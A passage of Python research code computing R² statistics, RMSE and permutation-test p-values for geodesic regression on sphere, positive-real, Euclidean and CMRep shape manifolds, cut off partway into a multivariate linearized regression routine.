mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
print( "Mean Area" )
print( mean_area_s )
print( "Mean Radius" )
print( mean_radius )
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = FrechetMean( pt_list[ n ] )
mu.UpdateMeanRadius()
print( "Calculating Variance..." )
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ n ][ i ] )
tVec_mu_to_y_i.SetMeanRadius( mean_radius )
tVec_mu_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
print( "Calculating Variance w.r.t Estimated....")
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def R2Statistics_CMRep_Abstract_Normal_Array( t_list, pt_list, meanArray, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
var_mu = 0
var_est = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
print( "Mean Area" )
print( mean_area_s )
print( "Mean Radius" )
print( mean_radius )
# Calculate intrinsic mean
print( "Calculating Frechet Mean... " )
mu = meanArray[ n ]
mu.UpdateMeanRadius()
print( "Calculating Variance..." )
# Variance w.r.t the mean
for i in range( nData ):
tVec_mu_to_y_i = mu.LogMap( pt_list[ n ][ i ] )
tVec_mu_to_y_i.SetMeanRadius( mean_radius )
tVec_mu_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_mu += ( tVec_mu_to_y_i.normSquared() / float( nData ) )
# Explained Variance w.r.t estimated geodesic
print( "Calculating Variance w.r.t Estimated....")
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( np.sqrt( mean_area_s ) * (1.0 / 3.0 ) )
var_est += ( tVec_est_to_y_i.normSquared() / float( nData ) )
R2 = ( 1 - ( var_est / var_mu ) )
print( "Data Variance w.r.t Frechet Mean" )
print( var_mu )
print( "Data Variance w.r.t Estimated Trend" )
print( var_est )
return R2
def RootMeanSquaredError( t_list, pt_list, base, tangent ):
if base.Type == "Sphere":
return RootMeanSquaredError_Sphere( t_list, pt_list, base, tangent )
elif base.Type == "PositiveReal":
return RootMeanSquaredError_PosReal( t_list, pt_list, base, tangent )
elif base.Type == "Euclidean":
return RootMeanSquaredError_Euclidean( t_list, pt_list, base, tangent )
elif base.Type == "CMRep":
return RootMeanSquaredError_CMRep( t_list, pt_list, base, tangent )
elif base.Type == "CMRep_Abstract":
return RootMeanSquaredError_CMRep_Abstract( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def RootMeanSquaredError_Sphere( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t estimated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
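# RMSE here is the square root of the mean squared geodesic residual to the estimated
# trend: e.g. squared residuals summing to 0.09 over nData = 9 observations give a
# mean of 0.01 and rmse = sqrt( 0.01 ) = 0.1.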
def RootMeanSquaredError_PosReal( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t estimated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_Euclidean( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t estimated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ] = ( tangent.tVector[ d ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_CMRep( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t estimated geodesic
rmse = 0
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_tVec( nManifoldDim )
for d in range( nManifoldDim ):
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 0 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 1 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 1 ] * t_i )
tVec_at_t_i.tVector[ d ][ 0 ].tVector[ 2 ] = ( tangent.tVector[ d ][ 0 ].tVector[ 2 ] * t_i )
tVec_at_t_i.tVector[ d ][ 1 ].tVector[ 0 ] = ( tangent.tVector[ d ][ 1 ].tVector[ 0 ] * t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def RootMeanSquaredError_CMRep_Abstract( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
# RMSE w.r.t estimated geodesic
rmse = 0
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ i ].UpdateMeanRadius()
mean_radius += ( pt_list[ i ].meanRadius / float( nData ) )
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = manifolds.cmrep_abstract_tVec( nManifoldDim )
for j in range( 4 ):
tVec_at_t_i.tVector[ j ] = tangent.tVector[ j ].ScalarMultiply( t_i )
est_pt_at_t_i = base.ExponentialMap( tVec_at_t_i )
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ i ] )
tVec_est_to_y_i.SetMeanScale( mean_area_s ** (1.0 / 3.0 ) )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
return np.sqrt( rmse )
def RootMeanSquaredError_CMRep_Abstract_Array( t_list, pt_list, base, tangent ):
nObject = len( pt_list )
nData = len( pt_list[0] )
nManifoldDim = pt_list[0][ 0 ].nDim
rmse = 0
for n in range( nObject ):
mean_area_s = 0
mean_radius = 0
for i in range( nData ):
mean_area_s += ( pt_list[ n ][ i ].pt[ 1 ].pt[ 0 ] / float( nData ) )
pt_list[ n ][ i ].UpdateMeanRadius()
mean_radius += ( pt_list[n][ i ].meanRadius / float( nData ) )
for i in range( nData ):
t_i = t_list[ i ]
# Tangent Vector * time
tVec_at_t_i = tangent[ n ].ScalarMultiply( t_i )
est_pt_at_t_i = base[ n ].ExponentialMap( tVec_at_t_i )
est_pt_at_t_i.UpdateMeanRadius()
tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( mean_area_s ** (1.0 / 3.0 ) )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def R2Statistics_CMRep_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_pos_atom = []
R2_rad_atom = []
# Calculate intrinsic mean
for i in range( nManifoldDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i = base.pt[ i ][ 0 ]
tangent_pos_i = tangent.tVector[ i ][ 0 ]
base_rad_i = base.pt[ i ][ 1 ]
tangent_rad_i = tangent.tVector[ i ][ 1 ]
R2_pos_i = R2Statistics( t_list_pos_i, pt_list_pos_i, base_pos_i, tangent_pos_i )
R2_rad_i = R2Statistics( t_list_rad_i, pt_list_rad_i, base_rad_i, tangent_rad_i )
R2_pos_atom.append( R2_pos_i )
R2_rad_atom.append( R2_rad_i )
R2_atom = [ R2_pos_atom, R2_rad_atom ]
return R2_atom
def R2Statistics_CMRep_Abstract_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_Center = 0
R2_Scale = 0
RMSE_Atom = []
RMSE_Center = 0
RMSE_Scale = 0
# Center - Global, Euclidean
pt_list_center = []
t_list_center = list( t_list )
for i in range( nData ):
pt_list_center.append( pt_list[ i ].pt[ 0 ] )
base_center = base.pt[ 0 ]
tangent_center = tangent.tVector[ 0 ]
## R2
R2_center = R2Statistics( t_list_center, pt_list_center, base_center, tangent_center )
## RMSE
RMSE_Center = RootMeanSquaredError( t_list_center, pt_list_center, base_center, tangent_center )
# Scale - Global, Positive Real
pt_list_scale = []
t_list_scale = list( t_list )
for i in range( nData ):
pt_list_scale.append( pt_list[ i ].pt[ 1 ] )
print( "RMSE Scale Check" )
print( "41st Atom" )
print( pt_list_scale[ 40 ].pt[ 0 ] )
base_scale = base.pt[ 1 ]
tangent_scale = tangent.tVector[ 1 ]
## R2
R2_scale = R2Statistics( t_list_scale, pt_list_scale, base_scale, tangent_scale )
## RMSE
RMSE_scale = RootMeanSquaredError( t_list_scale, pt_list_scale, base_scale, tangent_scale )
# Position Abstract - Global, Sphere
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## R2
R2_pos_abst = R2Statistics( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
## RMSE
RMSE_pos_abst = RootMeanSquaredError( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
# Relative Position - Local, Euclidean
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## Calculate a Frechet mean of relative positions
mu_pos_abstr = FrechetMean( pt_list_pos_abst )
H_sub = HelmertSubmatrix( nManifoldDim )
H_sub_T = H_sub.T
## Frechet Mean : Relative Positions on a 3(n-1)-1 sphere
mu_pos_abstr_sphere_matrix = np.array( mu_pos_abstr.pt ).reshape( -1, 3 )
## Frechet Mean : Relative Positions on Euclidean
mu_pos_abstr_euclidean_matrix = np.dot( H_sub_T, mu_pos_abstr_sphere_matrix )
## Estimated Trajectory
geodesic_trend_euclidean_arr = []
data_euclidean_arr = []
for i in range( nData ):
t_i = t_list_pos_abst[ i ]
## Estimated Points from Sphere to Euclidean
tVec_at_t_i = tangent_pos_abst.ScalarMultiply( t_i )
est_pt_at_t_i = base_pos_abst.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i_sphere_matrix = np.array( est_pt_at_t_i.pt ).reshape( -1, 3 )
est_pt_at_t_i_euclidean_matrix = np.dot( H_sub_T, est_pt_at_t_i_sphere_matrix )
geodesic_trend_euclidean_arr.append( est_pt_at_t_i_euclidean_matrix )
## Data points from Sphere to Euclidean
data_i = pt_list_pos_abst[ i ]
data_i_sphere_matrix = np.array( data_i.pt ).reshape( -1, 3 )
data_i_euclidean_matrix = np.dot( H_sub_T, data_i_sphere_matrix )
data_euclidean_arr.append( data_i_euclidean_matrix )
## Calculate atom-wise locational R^2 on Euclidean metric
## R2
R2_Pos_Euclidean_Atom = []
## RMSE
RMSE_Pos_Euclidean_Atom = []
for d in range( nManifoldDim ):
var_mu_d = 0
var_est_d = 0
for i in range( nData ):
# Data
pt_i_d = data_euclidean_arr[ i ][ d, : ]
# Mean
mu_i_d = mu_pos_abstr_euclidean_matrix[ d, : ]
# Estimated
est_i_d = geodesic_trend_euclidean_arr[ i ][ d, : ]
sqDist_mu_i_d = np.linalg.norm( np.subtract( pt_i_d, mu_i_d ) ) ** 2
sqDist_est_i_d = np.linalg.norm( np.subtract( pt_i_d, est_i_d ) ) ** 2
var_mu_d += sqDist_mu_i_d
var_est_d += sqDist_est_i_d
R2_d = ( 1 - ( var_est_d / var_mu_d ) )
R2_Pos_Euclidean_Atom.append( R2_d )
RMSE_Pos_Euclidean_Atom.append( np.sqrt( var_est_d / float( nData ) ) )
# Radius - Local, Positive Real : log-Euclidean
## R2
R2_Rad_PosReal_Atom = []
## RMSE
RMSE_Rad_PosReal_Atom = []
pt_list_rad = []
t_list_rad = list( t_list )
for i in range( nData ):
pt_list_rad.append( pt_list[ i ].pt[ 3 ] )
base_rad = base.pt[ 3 ]
tangent_rad = tangent.tVector[ 3 ]
## Calculate a Frechet mean of Radius
mu_rad = FrechetMean( pt_list_rad )
## Estimated Trend Trajectory
geodesic_trend_rad_arr = []
for i in range( nData ):
t_i = t_list_rad[ i ]
## Estimated Points from Sphere to Euclidean
tVec_at_t_i = tangent_rad.ScalarMultiply( t_i )
est_pt_at_t_i = base_rad.ExponentialMap( tVec_at_t_i )
geodesic_trend_rad_arr.append( est_pt_at_t_i )
for d in range( nManifoldDim ):
var_mu_d = 0
var_est_d = 0
for i in range( nData ):
# Data
pt_i_d = pt_list_rad[ i ].pt[ d ]
# Mean
mu_i_d = mu_rad.pt[ d ]
# Estimated
est_i_d = geodesic_trend_rad_arr[ i ].pt[ d ]
# Sq. distance to the Frechet mean
sqDist_mu_i_d = ( np.log( pt_i_d ) - np.log( mu_i_d ) ) ** 2
# Sq. distance to the estimated trajectory
sqDist_est_i_d = ( np.log( pt_i_d ) - np.log( est_i_d ) ) ** 2
var_mu_d += sqDist_mu_i_d
var_est_d += sqDist_est_i_d
R2_rad_d = ( 1 - ( var_est_d / var_mu_d ) )
R2_Rad_PosReal_Atom.append( R2_rad_d )
RMSE_Rad_PosReal_Atom.append( np.sqrt( var_est_d / float( nData ) ) )
# All R2 Statistics
R2_atom = [ R2_center, R2_scale, R2_pos_abst, R2_Pos_Euclidean_Atom, R2_Rad_PosReal_Atom ]
RMSE_Atom = [ RMSE_Center, RMSE_scale, RMSE_pos_abst, RMSE_Pos_Euclidean_Atom, RMSE_Rad_PosReal_Atom ]
return R2_atom, RMSE_Atom
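# Returned layout (as constructed above): R2_atom = [ center R^2, scale R^2,
# abstract-position R^2, per-atom Euclidean position R^2 list, per-atom radius R^2 list ];
# RMSE_Atom follows the same ordering.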
def R2Statistics_CMRep_Abstract_Normal_Atom( t_list, pt_list, mu, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_Center = 0
R2_Scale = 0
RMSE_Atom = []
RMSE_Center = 0
RMSE_Scale = 0
# Center - Global, Euclidean
pt_list_center = []
t_list_center = list( t_list )
for i in range( nData ):
pt_list_center.append( pt_list[ i ].pt[ 0 ] )
base_center = base.pt[ 0 ]
tangent_center = tangent.tVector[ 0 ]
## R2
R2_center = R2Statistics_Mu( t_list_center, pt_list_center, base_center, tangent_center, mu.pt[ 0 ] )
## RMSE
RMSE_Center = RootMeanSquaredError( t_list_center, pt_list_center, base_center, tangent_center )
# Scale - Global, Positive Real
pt_list_scale = []
t_list_scale = list( t_list )
for i in range( nData ):
pt_list_scale.append( pt_list[ i ].pt[ 1 ] )
print( "RMSE Scale Check" )
print( "41st Atom" )
print( pt_list_scale[ 40 ].pt[ 0 ] )
base_scale = base.pt[ 1 ]
tangent_scale = tangent.tVector[ 1 ]
## R2
R2_scale = R2Statistics_Mu( t_list_scale, pt_list_scale, base_scale, tangent_scale, mu.pt[ 1 ] )
## RMSE
RMSE_scale = RootMeanSquaredError( t_list_scale, pt_list_scale, base_scale, tangent_scale )
# Position Abstract - Global, Sphere
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## R2
R2_pos_abst = R2Statistics_Mu( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst, mu.pt[ 2 ] )
## RMSE
RMSE_pos_abst = RootMeanSquaredError( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
# Radius - Local, Positive Real : log-Euclidean
## R2
R2_Rad_PosReal_Atom = []
## RMSE
RMSE_Rad_PosReal_Atom = []
pt_list_rad = []
t_list_rad = list( t_list )
for i in range( nData ):
pt_list_rad.append( pt_list[ i ].pt[ 3 ] )
base_rad = base.pt[ 3 ]
tangent_rad = tangent.tVector[ 3 ]
## Calculate a Frechet mean of Radius
mu_rad = mu.pt[ 3 ]
for d in range( nManifoldDim ):
t_list_rad_d = list( t_list )
pt_list_rad_d = []
for i in range( nData ):
rad_d_i = manifolds.pos_real( 1 )
rad_d_i.SetPoint( pt_list_rad[ i ].pt[ d ] )
pt_list_rad_d.append( rad_d_i )
base_rad_d = manifolds.pos_real( 1 )
base_rad_d.SetPoint( [ base_rad.pt[ d ] ] )
tangent_rad_d = manifolds.pos_real_tVec( 1 )
tangent_rad_d.SetTangentVector( tangent_rad.tVector[ d ] )
mu_rad_d = manifolds.pos_real( 1 )
mu_rad_d.SetPoint( [ mu_rad.pt[ d ] ] )
R2_rad_d = R2Statistics_Mu( t_list_rad_d, pt_list_rad_d, base_rad_d, tangent_rad_d, mu_rad_d )
R2_Rad_PosReal_Atom.append( R2_rad_d )
RMSE_rad_d = RootMeanSquaredError( t_list_rad_d, pt_list_rad_d, base_rad_d, tangent_rad_d )
RMSE_Rad_PosReal_Atom.append( RMSE_rad_d )
# Boundary Normal 1 - Local, S^2
## R2
R2_Normal1_Sphere_Atom = []
## RMSE
RMSE_Normal1_Sphere_Atom = []
pt_list_normal1 = []
t_list_normal1 = list( t_list )
for i in range( nData ):
pt_list_normal1.append( pt_list[ i ].pt[ 4 ] )
base_normal1 = base.pt[ 4 ]
tangent_normal1 = tangent.tVector[ 4 ]
mu_normal1 = mu.pt[ 4 ]
for d in range( nManifoldDim ):
t_list_normal1_d = list( t_list )
pt_list_normal1_d = []
for i in range( nData ):
pt_list_normal1_d.append( pt_list_normal1[ i ][ d ] )
base_normal1_d = manifolds.sphere( 3 )
base_normal1_d.SetPoint( base_normal1[ d ].pt )
tangent_normal1_d = manifolds.sphere_tVec( 3 )
tangent_normal1_d.SetTangentVector( tangent_normal1[ d ].tVector )
mu_normal1_d = manifolds.sphere( 3 )
mu_normal1_d.SetPoint( mu_normal1[ d ].pt )
R2_normal1_d = R2Statistics_Mu( t_list_normal1_d, pt_list_normal1_d, base_normal1_d, tangent_normal1_d, mu_normal1_d )
R2_Normal1_Sphere_Atom.append( R2_normal1_d )
RMSE_normal1_d = RootMeanSquaredError( t_list_normal1_d, pt_list_normal1_d, base_normal1_d, tangent_normal1_d )
RMSE_Normal1_Sphere_Atom.append( RMSE_normal1_d )
# Boundary Normal 2 - Local, S^2
## R2
R2_Normal2_Sphere_Atom = []
## RMSE
RMSE_Normal2_Sphere_Atom = []
pt_list_normal2 = []
t_list_normal2 = list( t_list )
for i in range( nData ):
pt_list_normal2.append( pt_list[ i ].pt[ 5 ] )
base_normal2 = base.pt[ 5 ]
tangent_normal2 = tangent.tVector[ 5 ]
mu_normal2 = mu.pt[ 5 ]
for d in range( nManifoldDim ):
t_list_normal2_d = list( t_list )
pt_list_normal2_d = []
for i in range( nData ):
pt_list_normal2_d.append( pt_list_normal2[ i ][ d ] )
base_normal2_d = manifolds.sphere( 3 )
base_normal2_d.SetPoint( base_normal2[ d ].pt )
tangent_normal2_d = manifolds.sphere_tVec( 3 )
tangent_normal2_d.SetTangentVector( tangent_normal2[ d ].tVector )
mu_normal2_d = manifolds.sphere( 3 )
mu_normal2_d.SetPoint( mu_normal2[ d ].pt )
R2_normal2_d = R2Statistics_Mu( t_list_normal2_d, pt_list_normal2_d, base_normal2_d, tangent_normal2_d, mu_normal2_d )
R2_Normal2_Sphere_Atom.append( R2_normal2_d )
RMSE_normal2_d = RootMeanSquaredError( t_list_normal2_d, pt_list_normal2_d, base_normal2_d, tangent_normal2_d )
RMSE_Normal2_Sphere_Atom.append( RMSE_normal2_d )
# All R2 Statistics
R2_atom = [ R2_center, R2_scale, R2_pos_abst, R2_Rad_PosReal_Atom, R2_Normal1_Sphere_Atom, R2_Normal2_Sphere_Atom ]
RMSE_Atom = [ RMSE_Center, RMSE_scale, RMSE_pos_abst, RMSE_Rad_PosReal_Atom, RMSE_Normal1_Sphere_Atom, RMSE_Normal2_Sphere_Atom ]
return R2_atom, RMSE_Atom
def RootMeanSquaredError_CMRep_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
RMSE_Atom = []
RMSE_pos_atom = []
RMSE_rad_atom = []
# Calculate intrinsic mean
for i in range( nManifoldDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i = base.pt[ i ][ 0 ]
tangent_pos_i = tangent.tVector[ i ][ 0 ]
base_rad_i = base.pt[ i ][ 1 ]
tangent_rad_i = tangent.tVector[ i ][ 1 ]
RMSE_pos_i = RootMeanSquaredError( t_list_pos_i, pt_list_pos_i, base_pos_i, tangent_pos_i )
RMSE_rad_i = RootMeanSquaredError( t_list_rad_i, pt_list_rad_i, base_rad_i, tangent_rad_i )
RMSE_pos_atom.append( RMSE_pos_i )
RMSE_rad_atom.append( RMSE_rad_i )
RMSE_atom = [ RMSE_pos_atom, RMSE_rad_atom ]
return RMSE_atom
def NullHypothesisTestingPermutationTest( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
if base.Type == "Sphere":
return NullHypothesisTestingPermutationTest_Sphere( t_list, pt_list, base, tangent, nTrial, max_iter, stepSize, step_tol )
elif base.Type == "PositiveReal":
return NullHypothesisTestingPermutationTest_PosReal( t_list, pt_list, base, tangent, nTrial, max_iter, stepSize, step_tol )
# elif base.Type == "Euclidean":
# R2Statistics_Euclidean( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def NullHypothesisTestingPermutationTest_Sphere( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
# Estimated R2
R2_est = R2Statistics( t_list, pt_list, base, tangent )
cnt_greater_R2 = 0
for i in range( nTrial ):
t_list_permuted = list( t_list )
shuffle( t_list_permuted )
base_i, tangent_i = GeodesicRegression( t_list_permuted, pt_list, max_iter, stepSize, step_tol, False )
R2_i = R2Statistics( t_list_permuted, pt_list, base_i, tangent_i )
if R2_i > R2_est:
cnt_greater_R2 += 1
return float( cnt_greater_R2 ) / float( nTrial )
def NullHypothesisTestingPermutationTest_PosReal( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
# Estimated R2
R2_est = R2Statistics( t_list, pt_list, base, tangent )
cnt_greater_R2 = 0
for i in range( nTrial ):
t_list_permuted = list( t_list )
shuffle( t_list_permuted )
base_i, tangent_i = GeodesicRegression( t_list_permuted, pt_list, max_iter, stepSize, step_tol, False )
R2_i = R2Statistics( t_list_permuted, pt_list, base_i, tangent_i )
if R2_i > R2_est:
cnt_greater_R2 += 1
return float( cnt_greater_R2 ) / float( nTrial )
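# Usage sketch of the permutation test (hypothetical data names): the returned value is
# the fraction of permuted fits whose R^2 exceeds the observed R^2, i.e. an empirical p-value.
#   p_value = NullHypothesisTestingPermutationTest( t_list, sphere_pt_list,
#                                                   base, tangent, nTrial = 1000 )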
##########################################################################################
### Multivariate Anchor Point Linearized Geodesic Regression ###
##########################################################################################
def MultivariateLinearizedGeodesicRegression( X, Y, VG, max_iter = 500, stepSize = 0.05, step_tol = 0.01, useFrechetMeanAnchor = False, verbose=False ):
if Y[ 0 ].Type == "Sphere":
return MultivariateLinearizedGeodesicRegression_Sphere( X, Y, VG, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "PositiveReal":
# return LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "Euclidean":
# return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "CMRep":
# return LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "CMRep_Abstract":
# return LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
else:
print( "Manifold type is not known" )
print( "Or a function is not ready, mb" )
return -1
def MultivariateLinearizedGeodesicRegression_Sphere( X, Y, VG, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# A continuous variable such as age should be the last entry of the independent variables
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( Y )
else:
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
